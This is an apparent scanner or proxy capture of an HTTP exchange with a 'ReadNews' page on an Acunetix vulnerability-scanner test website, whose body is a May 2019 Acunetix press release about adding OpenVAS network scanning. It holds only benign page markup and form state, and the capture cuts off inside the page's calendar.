5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLH7tLMBwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo%2BsuXOQO2cYqA7NT0P30nF
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22936
Response Body - size: 22,936 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo+suXOQO2cYqA7NT0P30nF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a 